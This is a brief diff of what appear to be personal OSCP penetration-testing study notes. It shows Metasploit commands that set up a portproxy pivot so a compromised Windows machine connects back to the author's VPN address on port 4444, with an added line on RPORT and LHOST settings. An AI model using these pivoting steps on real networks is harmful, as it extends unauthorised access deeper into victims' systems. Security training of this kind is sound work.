BRU1S3R/BRUISER_MASTER_OSCP_NOTES/BRUISER_WILL_PASS.md

 Browse like normal

-NOW TO GET THE MACHINE TO BE ABLE TO CONNECT BACK TO US use post/windows/manage/portproxy msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.12.80.21 (My VPN) msf post(windows/manage/portproxy) > set CONNECT_PORT 4444 (Whatever)
+NOW TO GET THE MACHINE TO BE ABLE TO CONNECT BACK TO US

+modify the default RPORT option to be that of the TCP port 8443 LHOST to be that of the pivot machine's external IP 172.16.80.100

+use post/windows/manage/portproxy
+msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.12.80.21 (My VPN)
+msf post(windows/manage/portproxy) > set CONNECT_PORT 4444 (Whatever)